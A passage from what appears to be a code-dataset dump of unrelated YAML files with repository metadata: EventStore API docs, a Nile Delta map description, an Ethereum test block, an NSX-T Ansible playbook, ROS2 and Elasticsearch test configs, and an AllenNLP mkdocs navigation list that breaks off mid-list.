EventStore.Projections.Core.Messages.ReaderSubscriptionManagement.SpoolStreamReading - uid: EventStore.Projections.Core.Messages commentId: N:EventStore.Projections.Core.Messages name: EventStore.Projections.Core.Messages nameWithType: EventStore.Projections.Core.Messages fullName: EventStore.Projections.Core.Messages - uid: EventStore.Core.Bus.IHandle{EventStore.Projections.Core.Messages.CoreProjectionManagementControlMessage}.Handle(EventStore.Projections.Core.Messages.CoreProjectionManagementControlMessage) commentId: M:EventStore.Core.Bus.IHandle{EventStore.Projections.Core.Messages.CoreProjectionManagementControlMessage}.Handle(EventStore.Projections.Core.Messages.CoreProjectionManagementControlMessage) parent: EventStore.Core.Bus.IHandle{EventStore.Projections.Core.Messages.CoreProjectionManagementControlMessage} definition: EventStore.Core.Bus.IHandle`1.Handle(`0) name: Handle(CoreProjectionManagementControlMessage) nameWithType: IHandle<CoreProjectionManagementControlMessage>.Handle(CoreProjectionManagementControlMessage) fullName: EventStore.Core.Bus.IHandle<EventStore.Projections.Core.Messages.CoreProjectionManagementControlMessage>.Handle(EventStore.Projections.Core.Messages.CoreProjectionManagementControlMessage) nameWithType.vb: IHandle(Of CoreProjectionManagementControlMessage).Handle(CoreProjectionManagementControlMessage) fullName.vb: EventStore.Core.Bus.IHandle(Of EventStore.Projections.Core.Messages.CoreProjectionManagementControlMessage).Handle(EventStore.Projections.Core.Messages.CoreProjectionManagementControlMessage) spec.csharp: - uid: EventStore.Core.Bus.IHandle`1.Handle(`0) name: Handle nameWithType: IHandle<CoreProjectionManagementControlMessage>.Handle fullName: EventStore.Core.Bus.IHandle<EventStore.Projections.Core.Messages.CoreProjectionManagementControlMessage>.Handle - name: ( nameWithType: ( fullName: ( - uid: EventStore.Projections.Core.Messages.CoreProjectionManagementControlMessage name: CoreProjectionManagementControlMessage nameWithType: CoreProjectionManagementControlMessage fullName: EventStore.Projections.Core.Messages.CoreProjectionManagementControlMessage - name: ) nameWithType: ) fullName: ) spec.vb: - uid: EventStore.Core.Bus.IHandle`1.Handle(`0) name: Handle nameWithType: IHandle(Of CoreProjectionManagementControlMessage).Handle fullName: EventStore.Core.Bus.IHandle(Of EventStore.Projections.Core.Messages.CoreProjectionManagementControlMessage).Handle - name: ( nameWithType: ( fullName: ( - uid: EventStore.Projections.Core.Messages.CoreProjectionManagementControlMessage name: CoreProjectionManagementControlMessage nameWithType: CoreProjectionManagementControlMessage fullName: EventStore.Projections.Core.Messages.CoreProjectionManagementControlMessage - name: ) nameWithType: ) fullName: ) - uid: EventStore.Projections.Core.Messages.CoreProjectionManagementControlMessage commentId: T:EventStore.Projections.Core.Messages.CoreProjectionManagementControlMessage parent: EventStore.Projections.Core.Messages name: CoreProjectionManagementControlMessage nameWithType: CoreProjectionManagementControlMessage fullName: EventStore.Projections.Core.Messages.CoreProjectionManagementControlMessage - uid: EventStore.Core.Bus.IHandle{EventStore.Projections.Core.Messages.ParallelQueryProcessingMessages.PartitionProcessingResultOutputBase}.Handle(EventStore.Projections.Core.Messages.ParallelQueryProcessingMessages.PartitionProcessingResultOutputBase) commentId: M:EventStore.Core.Bus.IHandle{EventStore.Projections.Core.Messages.ParallelQueryProcessingMessages.PartitionProcessingResultOutputBase}.Handle(EventStore.Projections.Core.Messages.ParallelQueryProcessingMessages.PartitionProcessingResultOutputBase) parent: EventStore.Core.Bus.IHandle{EventStore.Projections.Core.Messages.ParallelQueryProcessingMessages.PartitionProcessingResultOutputBase} definition: EventStore.Core.Bus.IHandle`1.Handle(`0) name: Handle(PartitionProcessingResultOutputBase) nameWithType: IHandle<PartitionProcessingResultOutputBase>.Handle(PartitionProcessingResultOutputBase) fullName: EventStore.Core.Bus.IHandle<EventStore.Projections.Core.Messages.ParallelQueryProcessingMessages.PartitionProcessingResultOutputBase>.Handle(EventStore.Projections.Core.Messages.ParallelQueryProcessingMessages.PartitionProcessingResultOutputBase) nameWithType.vb: IHandle(Of PartitionProcessingResultOutputBase).Handle(PartitionProcessingResultOutputBase) fullName.vb: EventStore.Core.Bus.IHandle(Of EventStore.Projections.Core.Messages.ParallelQueryProcessingMessages.PartitionProcessingResultOutputBase).Handle(EventStore.Projections.Core.Messages.ParallelQueryProcessingMessages.PartitionProcessingResultOutputBase) spec.csharp: - uid: EventStore.Core.Bus.IHandle`1.Handle(`0) name: Handle nameWithType: IHandle<PartitionProcessingResultOutputBase>.Handle fullName: EventStore.Core.Bus.IHandle<EventStore.Projections.Core.Messages.ParallelQueryProcessingMessages.PartitionProcessingResultOutputBase>.Handle - name: ( nameWithType: ( fullName: ( - uid: EventStore.Projections.Core.Messages.ParallelQueryProcessingMessages.PartitionProcessingResultOutputBase name: PartitionProcessingResultOutputBase nameWithType: PartitionProcessingResultOutputBase fullName: EventStore.Projections.Core.Messages.ParallelQueryProcessingMessages.PartitionProcessingResultOutputBase - name: ) nameWithType: ) fullName: ) spec.vb: - uid: EventStore.Core.Bus.IHandle`1.Handle(`0) name: Handle nameWithType: IHandle(Of PartitionProcessingResultOutputBase).Handle fullName: EventStore.Core.Bus.IHandle(Of EventStore.Projections.Core.Messages.ParallelQueryProcessingMessages.PartitionProcessingResultOutputBase).Handle - name: ( nameWithType: ( fullName: ( - uid: EventStore.Projections.Core.Messages.ParallelQueryProcessingMessages.PartitionProcessingResultOutputBase name: PartitionProcessingResultOutputBase nameWithType: PartitionProcessingResultOutputBase fullName: EventStore.Projections.Core.Messages.ParallelQueryProcessingMessages.PartitionProcessingResultOutputBase - name: ) nameWithType: ) fullName: ) - uid: EventStore.Projections.Core.Messages.ParallelQueryProcessingMessages.PartitionProcessingResultOutputBase commentId: T:EventStore.Projections.Core.Messages.ParallelQueryProcessingMessages.PartitionProcessingResultOutputBase parent: EventStore.Projections.Core.Messages.ParallelQueryProcessingMessages name: PartitionProcessingResultOutputBase nameWithType: PartitionProcessingResultOutputBase fullName: EventStore.Projections.Core.Messages.ParallelQueryProcessingMessages.PartitionProcessingResultOutputBase
44.308503
264
0.792755
e50fd4638a1ddb1115de9fb81e1b652b5872c067
1,110
yml
YAML
collection/day02/info.yml
ishibaro/uv-app-starter
61778ead79637470790b2c266a3abe635ac994ef
[ "MIT" ]
null
null
null
collection/day02/info.yml
ishibaro/uv-app-starter
61778ead79637470790b2c266a3abe635ac994ef
[ "MIT" ]
null
null
null
collection/day02/info.yml
ishibaro/uv-app-starter
61778ead79637470790b2c266a3abe635ac994ef
[ "MIT" ]
null
null
null
label: Day 02 attribution: ishiba description: Based on my PhD research with data from the EES (@egyptexplorationsociety) metadata: title: Day 2. Lines - Nile Delta travel routes from K. Samedi to San el-Hagar Description: You have a ploion hellenikon to transport good from Canopus to Tanis. Would you use the shortest or the fastest route? Which one is the safest? Here, 4 different networks are shown to compare potential ease of movement in the Nile Delta. license: <a rel="license" href="http://creativecommons.org/licenses/by-nc-sa/4.0/"><img alt="Creative Commons License" style="border-width:0" src="https://i.creativecommons.org/l/by-nc-sa/4.0/88x31.png" /></a><br />This work is licensed under a <a rel="license" href="http://creativecommons.org/licenses/by-nc-sa/4.0/">Creative Commons Attribution-NonCommercial-ShareAlike 4.0 International License</a>. date: 2021 creator: Ishiba RO website: <a href="http://ishiba.blogspot.com">Blog de ishiba</a> software: QGIS notes: Aunque fue publicado originalmente en Twitter e Instagram, este mapa es parte de una investigación de doctorado.
92.5
405
0.763964
e43b81f93a2296b722333d94e3c374ec619e826f
2,226
yaml
YAML
tests/minimal/phase0/finality/finality/pyspec_tests/finality_no_updates_at_genesis/blocks_4.yaml
SifraiHQ/eth2.0-spec-tests
289175b2bf8a12c901bf2eef79605447c5706441
[ "MIT" ]
null
null
null
tests/minimal/phase0/finality/finality/pyspec_tests/finality_no_updates_at_genesis/blocks_4.yaml
SifraiHQ/eth2.0-spec-tests
289175b2bf8a12c901bf2eef79605447c5706441
[ "MIT" ]
null
null
null
tests/minimal/phase0/finality/finality/pyspec_tests/finality_no_updates_at_genesis/blocks_4.yaml
SifraiHQ/eth2.0-spec-tests
289175b2bf8a12c901bf2eef79605447c5706441
[ "MIT" ]
null
null
null
message: slot: 5 proposer_index: 44 parent_root: '0x58ce04972e44ccec27653cf84a543e4c4ebd820835be550aabdaa259af8bf42f' state_root: '0x32653925f3f7eea04ec0f38f5b58081386b7396c099a3c964a494786f575fff4' body: randao_reveal: '0xabd64836e8e2346814b47e8e205b6f5f514f9f888e5d33cfae5854f431de1419709515ac17a7440729dd13384a563d221085d419e7a76bbfe36db31ed3fd686c472b5fc15641ae8adbbde7792d78fb308179fece30edf75aeb7d37dd00dcd4d7' eth1_data: {deposit_root: '0x0000000000000000000000000000000000000000000000000000000000000000', deposit_count: 64, block_hash: '0x0000000000000000000000000000000000000000000000000000000000000000'} graffiti: '0x0000000000000000000000000000000000000000000000000000000000000000' proposer_slashings: [] attester_slashings: [] attestations: - aggregation_bits: '0x1f' data: slot: 4 index: 0 beacon_block_root: '0x58ce04972e44ccec27653cf84a543e4c4ebd820835be550aabdaa259af8bf42f' source: {epoch: 0, root: '0x0000000000000000000000000000000000000000000000000000000000000000'} target: {epoch: 0, root: '0xcea6ecd3d3188e32ebf611f960eebd45b6c6f477a7cff242fa567a42653bfc7c'} signature: '0x91b87a446c71ee260e0783ca6a39d72c5e96923fe71a0263d0223b6572febe1fd3fe2b53ce26614a9afe78477a32d9711626f8c0e43c94a67afc65a62eaa8dd811704634c7b3a2808ed2173def70a12d710e65dd4c83164bf477b43278695f2c' - aggregation_bits: '0x1f' data: slot: 4 index: 1 beacon_block_root: '0x58ce04972e44ccec27653cf84a543e4c4ebd820835be550aabdaa259af8bf42f' source: {epoch: 0, root: '0x0000000000000000000000000000000000000000000000000000000000000000'} target: {epoch: 0, root: '0xcea6ecd3d3188e32ebf611f960eebd45b6c6f477a7cff242fa567a42653bfc7c'} signature: '0xa2db67bc285da19cf9f7c159ba546d1430495eb845c0bfd186882ca841d07e88e9ae8eb24b1bf2ed5ed28fa8925867e01993926e6a63e4741e910bd361476000807baa13c0f71362976c6d46f2db90e1df32ff6274138beb4688aebd19efeb7e' deposits: [] voluntary_exits: [] signature: '0xa3117184cd8da0c72fac75d23b95646bcb9eb8bc65d954d83f78d6effd49a5600c1d7a5851f474bed3b29b9153f8db3f0bed90c1ebf8a33277cca7f50072c3e394c4d5140bd7562be10009f4e52d5d5b69d05984546e6ee10fcb7744a4386ec5'
67.454545
215
0.848158
50f148337c9503f8070d665bdbe94418993a76ac
1,891
yml
YAML
bms-ansible-nsx/static_config.yml
rlbibi/NSX-T-Baremetal
ee98f80f30fad83b25cf223dd61d86154f6478ef
[ "BSD-2-Clause" ]
15
2018-12-10T06:37:07.000Z
2022-03-18T13:33:43.000Z
bms-ansible-nsx/static_config.yml
rlbibi/NSX-T-Baremetal
ee98f80f30fad83b25cf223dd61d86154f6478ef
[ "BSD-2-Clause" ]
6
2018-10-22T02:27:42.000Z
2019-12-30T08:20:24.000Z
bms-ansible-nsx/static_config.yml
rlbibi/NSX-T-Baremetal
ee98f80f30fad83b25cf223dd61d86154f6478ef
[ "BSD-2-Clause" ]
11
2018-10-19T04:34:29.000Z
2021-12-06T22:41:44.000Z
################################################################################ ### Copyright (C) 2018 VMware, Inc. All rights reserved. ### SPDX-License-Identifier: BSD-2-Clause ################################################################################ --- - hosts: servers_static any_errors_fatal: true tasks: - name: config underlay mode set_fact: config_mode: 'config_mode=static' underlay_mode: 'false' - import_tasks: auth/manager_thumbprint_validate.yml - import_tasks: system/get_os_type.yml - import_tasks: config/tn_uuid.yml - import_tasks: lsp/check_legacy_lsp.yml - import_tasks: lsp/vif_id.yml - import_tasks: vif/int_br_name.yml - import_tasks: validation/vif_id_check.yml - import_tasks: validation/static_input_check.yml - import_tasks: config/app_intf_name.yml - import_tasks: lsp/create_lsp.yml - import_tasks: lsp/save_lsp_id.yml - import_tasks: config/bms_config.yml - import_tasks: config/config.yml - import_tasks: vif/create_vif.yml - name: create bm dir file: path: /opt/vmware/nsx-bm state: directory mode: 0755 - name: create manual restore script copy: src: ./manual/static_dhcp_manual_restore.sh dest: /opt/vmware/nsx-bm/static_dhcp_manual_restore.sh owner: root group: root mode: 0755 - name: set IP address command: ifconfig {{ app_intf_name }} {{ static_ip }} netmask {{ netmask }} - import_tasks: vif/attach_vif.yml - import_tasks: route/route.yml when: routing_table is defined - import_tasks: config/config.yml - name: create bootup script template: src: templates/bms_static_init.j2 dest: /etc/init.d/nsx-baremetal owner: root group: root mode: 0755 - import_tasks: system/add_service_bootup.yml
35.679245
81
0.615019
995e80d0e66318f09d6fa39242dd445a6bfff0a1
391
yaml
YAML
dev_ws/src/dm_preview/config/common.yaml
eYs3D/HD-DM-ROS2-SDK-Release
4a110f9c9cf76cc8dc0886e96dd3c3ebf7cb9e33
[ "Apache-2.0" ]
null
null
null
dev_ws/src/dm_preview/config/common.yaml
eYs3D/HD-DM-ROS2-SDK-Release
4a110f9c9cf76cc8dc0886e96dd3c3ebf7cb9e33
[ "Apache-2.0" ]
null
null
null
dev_ws/src/dm_preview/config/common.yaml
eYs3D/HD-DM-ROS2-SDK-Release
4a110f9c9cf76cc8dc0886e96dd3c3ebf7cb9e33
[ "Apache-2.0" ]
null
null
null
# config/common_yaml # Common parameters to eYs3d cameras # --- /**: ros__parameters: qos_history: 1 # '1': KEEP_LAST - '2': KEEP_ALL qos_depth: 10 # Queue size if using KEEP_LAST qos_reliability: 1 # '1': RELIABLE - '2': BEST_EFFORT qos_durability: 2 # '1': TRANSIENT_LOCAL - '2': VOLATILE
30.076923
78
0.526854
999d9f610ffb08d41e22f21d07c923299eeb0b30
932
yaml
YAML
modules/lang-groovy/src/test/resources/rest-api-spec/test/lang_groovy/90_missing.yaml
luyuncheng/elasticsearch_encrypt
c98e3f60f78fb47ae7482d96952f2dbabd1d6d49
[ "Apache-2.0" ]
2
2016-12-08T06:35:08.000Z
2021-08-12T08:43:15.000Z
modules/lang-groovy/src/test/resources/rest-api-spec/test/lang_groovy/90_missing.yaml
luyuncheng/elasticsearch_encrypt
c98e3f60f78fb47ae7482d96952f2dbabd1d6d49
[ "Apache-2.0" ]
1
2021-06-01T21:50:40.000Z
2021-06-01T21:50:40.000Z
modules/lang-groovy/src/test/resources/rest-api-spec/test/lang_groovy/90_missing.yaml
luyuncheng/elasticsearch_encrypt
c98e3f60f78fb47ae7482d96952f2dbabd1d6d49
[ "Apache-2.0" ]
1
2021-08-12T08:43:15.000Z
2021-08-12T08:43:15.000Z
--- "Missing document (partial doc)": - do: catch: missing update: index: test_1 type: test id: 1 body: { doc: { foo: bar } } - do: update: index: test_1 type: test id: 1 body: { doc: { foo: bar } } ignore: 404 --- "Missing document (script)": - skip: features: groovy_scripting - do: catch: missing update: index: test_1 type: test id: 1 body: script: inline: "ctx._source.foo = bar" params: { bar: 'xxx' } lang: "groovy" - do: update: index: test_1 type: test id: 1 ignore: 404 body: script: inline: "ctx._source.foo = bar" params: { bar: 'xxx' }
19.020408
51
0.386266
d945d5229d83e56016cdd49c6b53157eb8f35128
21,395
yml
YAML
mkdocs.yml
avinashsai/allennlp
6da30e9d53bd2c8199848addc78ff0e29d79b542
[ "Apache-2.0" ]
2
2021-04-27T19:56:28.000Z
2021-08-19T05:34:37.000Z
mkdocs.yml
avinashsai/allennlp
6da30e9d53bd2c8199848addc78ff0e29d79b542
[ "Apache-2.0" ]
5
2021-05-03T14:40:33.000Z
2021-05-03T14:40:34.000Z
mkdocs.yml
avinashsai/allennlp
6da30e9d53bd2c8199848addc78ff0e29d79b542
[ "Apache-2.0" ]
null
null
null
site_name: AllenNLP site_description: AllenNLP is a .. site_url: https://allennlp.org/ theme: name: material palette: primary: blue accent: grey logo: img/favicon.ico favicon: img/favicon.ico highlightjs: true hljs_languages: - python - typescript - json repo_name: allenai/allennlp repo_url: https://github.com/allenai/allennlp edit_uri: edit/master/docs/ # TODO(markn): Consider adding GA here, if we care about it. nav: - AllenNLP: README.md - Tutorials: - Predicting Paper Venues (pt1): tutorials/getting_started/predicting_paper_venues/predicting_paper_venues_pt1.md - Predicting Paper Venues (pt2): tutorials/getting_started/predicting_paper_venues/predicting_paper_venues_pt2.md - Walk Through: - Configuration: tutorials/getting_started/walk_through_allennlp/configuration.md - Creating a Model: tutorials/getting_started/walk_through_allennlp/creating_a_model.md - Training/Evaluation: tutorials/getting_started/walk_through_allennlp/training_and_evaluating.md - Using Pretrained Models: tutorials/getting_started/using_pretrained_models.md - Semantic Parsing: tutorials/getting_started/semantic_parsing.md - Laziness in AllenNLP: tutorials/getting_started/laziness.md - How To: - Create a configuration: tutorials/how_to/create_a_configuration.md - Use Elmo: tutorials/how_to/elmo.md - Train Transformer Elmo: tutorials/how_to/training_transformer_elmo.md - Use Span Representations: tutorials/how_to/span_representations.md - Using a Debugger: tutorials/how_to/using_a_debugger.md - Visualizing Model Internals: tutorials/how_to/visualizing_model_internals.md - API: - commands: - dry_run: api/commands/dry_run.md - elmo: api/commands/elmo.md - fine_tune: api/commands/fine_tune.md - predict: api/commands/predict.md - print_results: api/commands/print_results.md - train: api/commands/train.md - evaluate: api/commands/evaluate.md - subcommand: api/commands/subcommand.md - test_install: api/commands/test_install.md - find_learning_rate: api/commands/find_learning_rate.md - common: - params: api/common/params.md - util: api/common/util.md - from_params: api/common/from_params.md - checks: api/common/checks.md - registrable: api/common/registrable.md - tqdm: api/common/tqdm.md - testing: - model_test_case: api/common/testing/model_test_case.md - test_case: api/common/testing/test_case.md - file_utils: api/common/file_utils.md - data: - instance: api/data/instance.md - tokenizers: - sentence_splitter: api/data/tokenizers/sentence_splitter.md - token: api/data/tokenizers/token.md - pretrained_transformer_tokenizer: api/data/tokenizers/pretrained_transformer_tokenizer.md - spacy_tokenizer: api/data/tokenizers/spacy_tokenizer.md - tokenizer: api/data/tokenizers/tokenizer.md - whitespace_tokenizer: api/data/tokenizers/whitespace_tokenizer.md - pretrained_transformer_pre_tokenizer: api/data/tokenizers/pretrained_transformer_pre_tokenizer.md - letters_digits_tokenizer: api/data/tokenizers/letters_digits_tokenizer.md - character_tokenizer: api/data/tokenizers/character_tokenizer.md - dataset_readers: - semantic_dependency_parsing: api/data/dataset_readers/semantic_dependency_parsing.md - multiprocess_dataset_reader: api/data/dataset_readers/multiprocess_dataset_reader.md - masked_language_modeling: api/data/dataset_readers/masked_language_modeling.md - conll2003: api/data/dataset_readers/conll2003.md - interleaving_dataset_reader: api/data/dataset_readers/interleaving_dataset_reader.md - ccgbank: api/data/dataset_readers/ccgbank.md - simple_language_modeling: api/data/dataset_readers/simple_language_modeling.md - babi: api/data/dataset_readers/babi.md - sequence_tagging: api/data/dataset_readers/sequence_tagging.md - universal_dependencies: api/data/dataset_readers/universal_dependencies.md - copynet_seq2seq: api/data/dataset_readers/copynet_seq2seq.md - text_classification_json: api/data/dataset_readers/text_classification_json.md - semantic_role_labeling: api/data/dataset_readers/semantic_role_labeling.md - snli: api/data/dataset_readers/snli.md - universal_dependencies_multilang: api/data/dataset_readers/universal_dependencies_multilang.md - event2mind: api/data/dataset_readers/event2mind.md - next_token_lm: api/data/dataset_readers/next_token_lm.md - dataset_reader: api/data/dataset_readers/dataset_reader.md - coreference_resolution: - conll: api/data/dataset_readers/coreference_resolution/conll.md - winobias: api/data/dataset_readers/coreference_resolution/winobias.md - stanford_sentiment_tree_bank: api/data/dataset_readers/stanford_sentiment_tree_bank.md - ontonotes_ner: api/data/dataset_readers/ontonotes_ner.md - penn_tree_bank: api/data/dataset_readers/penn_tree_bank.md - dataset_utils: - ontonotes: api/data/dataset_readers/dataset_utils/ontonotes.md - span_utils: api/data/dataset_readers/dataset_utils/span_utils.md - conll2000: api/data/dataset_readers/conll2000.md - quora_paraphrase: api/data/dataset_readers/quora_paraphrase.md - seq2seq: api/data/dataset_readers/seq2seq.md - token_indexers: - openai_transformer_byte_pair_indexer: api/data/token_indexers/openai_transformer_byte_pair_indexer.md - single_id_token_indexer: api/data/token_indexers/single_id_token_indexer.md - ner_tag_indexer: api/data/token_indexers/ner_tag_indexer.md - token_indexer: api/data/token_indexers/token_indexer.md - token_characters_indexer: api/data/token_indexers/token_characters_indexer.md - elmo_indexer: api/data/token_indexers/elmo_indexer.md - spacy_indexer: api/data/token_indexers/spacy_indexer.md - wordpiece_indexer: api/data/token_indexers/wordpiece_indexer.md - dep_label_indexer: api/data/token_indexers/dep_label_indexer.md - pos_tag_indexer: api/data/token_indexers/pos_tag_indexer.md - pretrained_transformer_indexer: api/data/token_indexers/pretrained_transformer_indexer.md - batch: api/data/batch.md - dataset: api/data/dataset.md - fields: - metadata_field: api/data/fields/metadata_field.md - field: api/data/fields/field.md - adjacency_field: api/data/fields/adjacency_field.md - span_field: api/data/fields/span_field.md - namespace_swapping_field: api/data/fields/namespace_swapping_field.md - sequence_label_field: api/data/fields/sequence_label_field.md - label_field: api/data/fields/label_field.md - multilabel_field: api/data/fields/multilabel_field.md - sequence_field: api/data/fields/sequence_field.md - array_field: api/data/fields/array_field.md - text_field: api/data/fields/text_field.md - index_field: api/data/fields/index_field.md - list_field: api/data/fields/list_field.md - vocabulary: api/data/vocabulary.md - iterators: - data_iterator: api/data/iterators/data_iterator.md - homogeneous_batch_iterator: api/data/iterators/homogeneous_batch_iterator.md - multiprocess_iterator: api/data/iterators/multiprocess_iterator.md - same_language_iterator: api/data/iterators/same_language_iterator.md - pass_through_iterator: api/data/iterators/pass_through_iterator.md - bucket_iterator: api/data/iterators/bucket_iterator.md - basic_iterator: api/data/iterators/basic_iterator.md - interpret: - saliency_interpreters: - integrated_gradient: api/interpret/saliency_interpreters/integrated_gradient.md - saliency_interpreter: api/interpret/saliency_interpreters/saliency_interpreter.md - smooth_gradient: api/interpret/saliency_interpreters/smooth_gradient.md - simple_gradient: api/interpret/saliency_interpreters/simple_gradient.md - attackers: - utils: api/interpret/attackers/utils.md - hotflip: api/interpret/attackers/hotflip.md - input_reduction: api/interpret/attackers/input_reduction.md - attacker: api/interpret/attackers/attacker.md - models: - crf_tagger: api/models/crf_tagger.md - semantic_role_labeler: api/models/semantic_role_labeler.md - decomposable_attention: api/models/decomposable_attention.md - language_model: api/models/language_model.md - biaffine_dependency_parser_multilang: api/models/biaffine_dependency_parser_multilang.md - masked_language_model: api/models/masked_language_model.md - biaffine_dependency_parser: api/models/biaffine_dependency_parser.md - simple_tagger: api/models/simple_tagger.md - graph_parser: api/models/graph_parser.md - srl_bert: api/models/srl_bert.md - encoder_decoders: - simple_seq2seq: api/models/encoder_decoders/simple_seq2seq.md - copynet_seq2seq: api/models/encoder_decoders/copynet_seq2seq.md - composed_seq2seq: api/models/encoder_decoders/composed_seq2seq.md - biattentive_classification_network: api/models/biattentive_classification_network.md - model: api/models/model.md - basic_classifier: api/models/basic_classifier.md - bimpm: api/models/bimpm.md - esim: api/models/esim.md - event2mind: api/models/event2mind.md - next_token_lm: api/models/next_token_lm.md - ensemble: api/models/ensemble.md - archival: api/models/archival.md - coreference_resolution: - coref: api/models/coreference_resolution/coref.md - srl_util: api/models/srl_util.md - constituency_parser: api/models/constituency_parser.md - bidirectional_lm: api/models/bidirectional_lm.md - bert_for_classification: api/models/bert_for_classification.md - modules: - openai_transformer: api/modules/openai_transformer.md - scalar_mix: api/modules/scalar_mix.md - seq2seq_encoders: - compose_encoder: api/modules/seq2seq_encoders/compose_encoder.md - seq2seq_encoder: api/modules/seq2seq_encoders/seq2seq_encoder.md - pytorch_seq2seq_wrapper: api/modules/seq2seq_encoders/pytorch_seq2seq_wrapper.md - feedforward_encoder: api/modules/seq2seq_encoders/feedforward_encoder.md - pass_through_encoder: api/modules/seq2seq_encoders/pass_through_encoder.md - stacked_self_attention: api/modules/seq2seq_encoders/stacked_self_attention.md - bidirectional_language_model_transformer: api/modules/seq2seq_encoders/bidirectional_language_model_transformer.md - multi_head_self_attention: api/modules/seq2seq_encoders/multi_head_self_attention.md - intra_sentence_attention: api/modules/seq2seq_encoders/intra_sentence_attention.md - gated_cnn_encoder: api/modules/seq2seq_encoders/gated_cnn_encoder.md - qanet_encoder: api/modules/seq2seq_encoders/qanet_encoder.md - attention: - attention: api/modules/attention/attention.md - bilinear_attention: api/modules/attention/bilinear_attention.md - dot_product_attention: api/modules/attention/dot_product_attention.md - legacy_attention: api/modules/attention/legacy_attention.md - cosine_attention: api/modules/attention/cosine_attention.md - linear_attention: api/modules/attention/linear_attention.md - additive_attention: api/modules/attention/additive_attention.md - stacked_alternating_lstm: api/modules/stacked_alternating_lstm.md - encoder_base: api/modules/encoder_base.md - seq2seq_decoders: - decoder_net: api/modules/seq2seq_decoders/decoder_net.md - auto_regressive_seq_decoder: api/modules/seq2seq_decoders/auto_regressive_seq_decoder.md - stacked_self_attention_decoder_net: api/modules/seq2seq_decoders/stacked_self_attention_decoder_net.md - lstm_cell_decoder_net: api/modules/seq2seq_decoders/lstm_cell_decoder_net.md - seq_decoder: api/modules/seq2seq_decoders/seq_decoder.md - maxout: api/modules/maxout.md - elmo: api/modules/elmo.md - text_field_embedders: - basic_text_field_embedder: api/modules/text_field_embedders/basic_text_field_embedder.md - text_field_embedder: api/modules/text_field_embedders/text_field_embedder.md - time_distributed: api/modules/time_distributed.md - similarity_functions: - cosine: api/modules/similarity_functions/cosine.md - similarity_function: api/modules/similarity_functions/similarity_function.md - linear: api/modules/similarity_functions/linear.md - bilinear: api/modules/similarity_functions/bilinear.md - dot_product: api/modules/similarity_functions/dot_product.md - multiheaded: api/modules/similarity_functions/multiheaded.md - feedforward: api/modules/feedforward.md - sampled_softmax_loss: api/modules/sampled_softmax_loss.md - seq2vec_encoders: - boe_encoder: api/modules/seq2vec_encoders/boe_encoder.md - cnn_highway_encoder: api/modules/seq2vec_encoders/cnn_highway_encoder.md - seq2vec_encoder: api/modules/seq2vec_encoders/seq2vec_encoder.md - cnn_encoder: api/modules/seq2vec_encoders/cnn_encoder.md - bert_pooler: api/modules/seq2vec_encoders/bert_pooler.md - pytorch_seq2vec_wrapper: api/modules/seq2vec_encoders/pytorch_seq2vec_wrapper.md - residual_with_layer_dropout: api/modules/residual_with_layer_dropout.md - drop_connect: api/modules/drop_connect.md - bimpm_matching: api/modules/bimpm_matching.md - conditional_random_field: api/modules/conditional_random_field.md - stacked_bidirectional_lstm: api/modules/stacked_bidirectional_lstm.md - highway: api/modules/highway.md - span_extractors: - self_attentive_span_extractor: api/modules/span_extractors/self_attentive_span_extractor.md - bidirectional_endpoint_span_extractor: api/modules/span_extractors/bidirectional_endpoint_span_extractor.md - endpoint_span_extractor: api/modules/span_extractors/endpoint_span_extractor.md - span_extractor: api/modules/span_extractors/span_extractor.md - input_variational_dropout: api/modules/input_variational_dropout.md - masked_layer_norm: api/modules/masked_layer_norm.md - matrix_attention: - linear_matrix_attention: api/modules/matrix_attention/linear_matrix_attention.md - bilinear_matrix_attention: api/modules/matrix_attention/bilinear_matrix_attention.md - dot_product_matrix_attention: api/modules/matrix_attention/dot_product_matrix_attention.md - matrix_attention: api/modules/matrix_attention/matrix_attention.md - cosine_matrix_attention: api/modules/matrix_attention/cosine_matrix_attention.md - legacy_matrix_attention: api/modules/matrix_attention/legacy_matrix_attention.md - elmo_lstm: api/modules/elmo_lstm.md - pruner: api/modules/pruner.md - lstm_cell_with_projection: api/modules/lstm_cell_with_projection.md - language_model_heads: - gpt2: api/modules/language_model_heads/gpt2.md - language_model_head: api/modules/language_model_heads/language_model_head.md - bert: api/modules/language_model_heads/bert.md - token_embedders: - pretrained_transformer_embedder: api/modules/token_embedders/pretrained_transformer_embedder.md - openai_transformer_embedder: api/modules/token_embedders/openai_transformer_embedder.md - bidirectional_language_model_token_embedder: api/modules/token_embedders/bidirectional_language_model_token_embedder.md - embedding: api/modules/token_embedders/embedding.md - bert_token_embedder: api/modules/token_embedders/bert_token_embedder.md - token_characters_encoder: api/modules/token_embedders/token_characters_encoder.md - elmo_token_embedder_multilang: api/modules/token_embedders/elmo_token_embedder_multilang.md - pass_through_token_embedder: api/modules/token_embedders/pass_through_token_embedder.md - empty_embedder: api/modules/token_embedders/empty_embedder.md - bag_of_word_counts_token_embedder: api/modules/token_embedders/bag_of_word_counts_token_embedder.md - elmo_token_embedder: api/modules/token_embedders/elmo_token_embedder.md - language_model_token_embedder: api/modules/token_embedders/language_model_token_embedder.md - token_embedder: api/modules/token_embedders/token_embedder.md - augmented_lstm: api/modules/augmented_lstm.md - layer_norm: api/modules/layer_norm.md - nn: - util: api/nn/util.md - activations: api/nn/activations.md - beam_search: api/nn/beam_search.md - regularizers: - regularizer_applicator: api/nn/regularizers/regularizer_applicator.md - regularizers: api/nn/regularizers/regularizers.md - regularizer: api/nn/regularizers/regularizer.md - initializers: api/nn/initializers.md - chu_liu_edmonds: api/nn/chu_liu_edmonds.md - predictors: - predictor: api/predictors/predictor.md - semantic_role_labeler: api/predictors/semantic_role_labeler.md - simple_seq2seq: api/predictors/simple_seq2seq.md - decomposable_attention: api/predictors/decomposable_attention.md - coref: api/predictors/coref.md - masked_language_model: api/predictors/masked_language_model.md - biaffine_dependency_parser: api/predictors/biaffine_dependency_parser.md - event2mind: api/predictors/event2mind.md - sentence_tagger: api/predictors/sentence_tagger.md - next_token_lm: api/predictors/next_token_lm.md - text_classifier: api/predictors/text_classifier.md - open_information_extraction: api/predictors/open_information_extraction.md - constituency_parser: api/predictors/constituency_parser.md - seq2seq: api/predictors/seq2seq.md - tools: - inspect_cache: api/tools/inspect_cache.md - archive_surgery: api/tools/archive_surgery.md - create_elmo_embeddings_from_vocab: api/tools/create_elmo_embeddings_from_vocab.md - training: - metrics: - spearman_correlation: api/training/metrics/spearman_correlation.md - srl_eval_scorer: api/training/metrics/srl_eval_scorer.md - mean_absolute_error: api/training/metrics/mean_absolute_error.md - f1_measure: api/training/metrics/f1_measure.md - mention_recall: api/training/metrics/mention_recall.md - 